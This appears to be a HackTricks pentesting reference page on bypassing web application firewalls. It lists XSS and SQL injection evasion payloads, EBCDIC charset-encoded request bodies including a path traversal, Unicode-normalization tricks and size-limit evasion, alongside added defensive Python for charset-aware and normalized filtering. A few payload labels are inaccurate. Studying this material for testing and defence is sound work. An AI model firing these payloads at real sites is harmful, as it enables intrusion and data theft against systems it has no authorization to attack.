hacktricks/network-services-pentesting/pentesting-web/waf-bypass.md
2023-08-03 19:12:22 +00:00


WAF bypass

☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥

Regex bypass

Different techniques can be used to bypass the regex filters on firewalls, for example alternating the case, adding line breaks, and encoding the payload. Resources for the various bypasses can be found at PayloadsAllTheThings and OWASP. The examples below were taken from this article.

<sCrIpT>alert(XSS)</sCriPt> #changing the case of the tag
<<script>alert(XSS)</script> #prepending an additional "<"
<script>alert(XSS) // #removing the closing tag
<script>alert`XSS`</script> #using backticks instead of parentheses
java%0ascript:alert(1) #using encoded newline characters
<iframe src=http://malicous.com < #double open angle brackets
<STYLE>.classname{background-image:url("javascript:alert(XSS)");}</STYLE> #uncommon tags
<img/src=1/onerror=alert(0)> #bypass space filter by using / where a space is expected
<a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaaa href=javascript:alert(1)>xss</a> #extra characters
Function("ale"+"rt(1)")(); #using uncommon functions besides alert, console.log, and prompt
javascript:74163166147401571561541571411447514115414516216450615176 #octal encoding
<iframe src="javascript:alert(`xss`)"> #unicode encoding
/?id=1+un/**/ion+sel/**/ect+1,2,3-- #using comments in SQL query to break up statement
new Function`alt\`6\``; #using backticks instead of parentheses
data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+ #base64 encoding the javascript
%26%2397;lert(1) #using HTML encoding
<a src="%0Aj%0Aa%0Av%0Aa%0As%0Ac%0Ar%0Ai%0Ap%0At%0A%3Aconfirm(XSS)"> #Using Line Feed (LF) line breaks
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=confirm()> # use any chars that aren't letters, numbers, or encapsulation chars between event handler and equal sign (only works on Gecko engine)

Charset encoding

When dealing with web applications, it is common to encounter Web Application Firewalls (WAFs) that are designed to protect against various attacks. One common technique used by WAFs is to inspect the request and response payloads for malicious content.

One way to bypass a WAF is by manipulating the character encoding of the payload. By using a different character encoding, it is possible to obfuscate the payload and evade detection by the WAF.

For example, if a WAF is configured to block certain keywords or patterns, encoding the payload in a different character set can help bypass these filters.

Some common techniques for encoding payloads include URL encoding, Unicode encoding, and HTML entity encoding. Each has its own syntax and rules for encoding characters.

It is important to understand the specific encoding used by the target application and the WAF in order to bypass the filters effectively.

In addition to encoding, other techniques such as using alternative representations of characters or encoding the payload multiple times can also be used to bypass WAFs.

Overall, understanding how character encoding works and experimenting with different encoding techniques can be valuable for bypassing WAFs and successfully exploiting vulnerabilities in web applications.

# Charset encoding
application/x-www-form-urlencoded;charset=ibm037
multipart/form-data; charset=ibm037,boundary=blah
multipart/form-data; boundary=blah; charset=ibm037

## Python code
import urllib.parse
s = 'payload'
# encode the payload as EBCDIC (IBM037) bytes, then percent-encode them for the form body
print(urllib.parse.quote_plus(s.encode("IBM037")))

## Request example
GET / HTTP/1.1
Host: buggy
Content-Type: application/x-www-form-urlencoded; charset=ibm500
Content-Length: 61

%86%89%93%85%95%81%94%85=KKaKKa%C6%D3%C1%C7K%A3%A7%A3&x=L%A7n
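As an added defensive illustration (not code from the original page), the following Python decodes a form body in the charset declared by the Content-Type header before applying a keyword rule, which is the step a WAF needs in order to see through the EBCDIC trick above. The keyword rule, the constructed sample request and the field parsing are assumptions made for this example; the second body is the request shown on this page.

```python
import re
import urllib.parse

# Constructed for this example: a small keyword rule of the kind a WAF applies to bodies.
BLOCKED = re.compile(r"<script|onerror\s*=|union\s+select|\.\./", re.IGNORECASE)

def body_charset(content_type: str) -> str:
    """Return the charset parameter of a Content-Type header (UTF-8 when absent)."""
    m = re.search(r'charset\s*=\s*"?([\w-]+)', content_type, re.IGNORECASE)
    return m.group(1).lower() if m else "utf-8"

def decode_form(body: bytes, charset: str) -> dict:
    """Split on the ASCII '&' and '=' delimiters, percent-decode each part, then
    interpret the resulting bytes in the declared charset. That last step is what a
    WAF that assumes UTF-8 skips, and it is where the EBCDIC body hides its text."""
    fields = {}
    for pair in body.split(b"&"):
        key, _, value = pair.partition(b"=")
        key_bytes = urllib.parse.unquote_to_bytes(key.replace(b"+", b" "))
        val_bytes = urllib.parse.unquote_to_bytes(value.replace(b"+", b" "))
        fields[key_bytes.decode(charset, "replace")] = val_bytes.decode(charset, "replace")
    return fields

def inspect_naive(body: bytes) -> bool:
    """Header-blind inspection: percent-decode and read the body as UTF-8."""
    text = urllib.parse.unquote_plus(body.decode("ascii", "replace"))
    return bool(BLOCKED.search(text))

def inspect_charset_aware(content_type: str, body: bytes) -> bool:
    """Decode in the declared charset first, then run the same rule on every field."""
    fields = decode_form(body, body_charset(content_type))
    return any(BLOCKED.search(k) or BLOCKED.search(v) for k, v in fields.items())

# Constructed sample, built the same way the Python snippet above builds its body.
CONTENT_TYPE = "application/x-www-form-urlencoded; charset=ibm037"
PAYLOAD = "<script>alert(1)</script>"
BODY = (urllib.parse.quote_plus("q".encode("IBM037")) + "=" +
        urllib.parse.quote_plus(PAYLOAD.encode("IBM037"))).encode("ascii")

# The request body shown on this page (charset=ibm500); its first field is a path traversal.
PAGE_BODY = b"%86%89%93%85%95%81%94%85=KKaKKa%C6%D3%C1%C7K%A3%A7%A3&x=L%A7n"

if __name__ == "__main__":
    print("naive:", inspect_naive(BODY), "charset-aware:", inspect_charset_aware(CONTENT_TYPE, BODY))
    print(decode_form(PAGE_BODY, "ibm500"))
```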

Obfuscation

Obfuscation is a technique used to make code or data difficult to understand or analyze. In the context of web application security, obfuscation can be used to bypass Web Application Firewalls (WAFs) by disguising malicious payloads or evading signature-based detection.

JavaScript Obfuscation

JavaScript obfuscation involves transforming code to make it more difficult to read and understand. This can be achieved through techniques such as:

  • Variable and function name obfuscation: Renaming variables and functions to random or meaningless names.
  • String obfuscation: Encoding strings to make them less recognizable.
  • Code splitting: Breaking up code into smaller parts and dynamically loading them.
  • Control flow obfuscation: Modifying the order of code execution to confuse analysis tools.

Payload Obfuscation

Payload obfuscation is the process of disguising malicious code to evade detection. This can be done by:

  • Encoding: Transforming the payload using encoding techniques such as Base64 or URL encoding.
  • Encryption: Encrypting the payload using a key or algorithm to make it unreadable.
  • Compression: Compressing the payload to make it more difficult to analyze.
  • Randomization: Adding random data or noise to the payload to make it harder to detect.

Evading Signature-based Detection

Signature-based detection is a common method used by WAFs to identify and block known attack patterns. To bypass this detection, attackers can modify the payload or use techniques such as:

  • Payload mutation: Making small changes to the payload to create a new signature that is not recognized by the WAF.
  • Protocol-level evasion: Modifying the request or response headers to evade signature-based detection.
  • Fragmentation: Splitting the payload into smaller fragments to bypass payload size restrictions.

By using obfuscation techniques, attackers can increase the chances of successfully bypassing WAFs and executing their malicious payloads.

# IIS, ASP Classic
<%s%cr%u0131pt> == <script>

# Path blacklist bypass - Tomcat
/path1/path2/ == ;/path1;foo/path2;bar/;

Unicode compatibility

Depending on how the Unicode specification is implemented (more information here), characters that share Unicode compatibility may be able to bypass the WAF and execute the intended payload. Compatible characters can be found here.

Example

# under the NFKD normalization algorithm, the characters on the left translate
# to the XSS payload on the right
img src⁼p onerror⁼prompt⁽1⁾﹥  --> img src=p onerror='prompt(1)'>
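As an added defensive illustration (not code from the original page), this Python applies the same compatibility normalization (NFKC) to the example above before pattern matching, and shows why a filter that matches the raw string misses it while one that normalizes first does not. The event-handler pattern and the variant-enumeration helper are assumptions made for this example.

```python
import re
import unicodedata

# Constructed rule: the kind of pattern a WAF uses to catch inline event handlers.
EVENT_HANDLER = re.compile(r"on\w+\s*=", re.IGNORECASE)

# The example from the text: superscript/small-form characters that NFKC/NFKD fold to ASCII.
HOMOGLYPH_PAYLOAD = "img src⁼p onerror⁼prompt⁽1⁾﹥"

def normalize(s: str, form: str = "NFKC") -> str:
    """Apply Unicode compatibility normalization, as a backend may do before using the input."""
    return unicodedata.normalize(form, s)

def match_raw(s: str) -> bool:
    """Filter that matches the string exactly as received."""
    return bool(EVENT_HANDLER.search(s))

def match_normalized(s: str) -> bool:
    """Filter that normalizes first, so it sees what the backend will see."""
    return bool(EVENT_HANDLER.search(normalize(s)))

def compatibility_variants(ch: str) -> list:
    """List every BMP code point whose NFKD form is exactly `ch`, i.e. the characters a
    filter must treat as equivalent to `ch` (useful for building an equivalence table
    instead of hand-listing superscript, fullwidth and small-form variants)."""
    return [chr(cp) for cp in range(0x80, 0x10000)
            if not 0xD800 <= cp <= 0xDFFF and unicodedata.normalize("NFKD", chr(cp)) == ch]

if __name__ == "__main__":
    print(normalize(HOMOGLYPH_PAYLOAD))
    print("raw:", match_raw(HOMOGLYPH_PAYLOAD), "normalized:", match_normalized(HOMOGLYPH_PAYLOAD))
    print("variants of '=':", compatibility_variants("="))
```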

Exceeding the size limit

In cloud-based WAFs, if the payload exceeds a certain size X, the request is not inspected by the WAF at all. You can simply use this to bypass them.
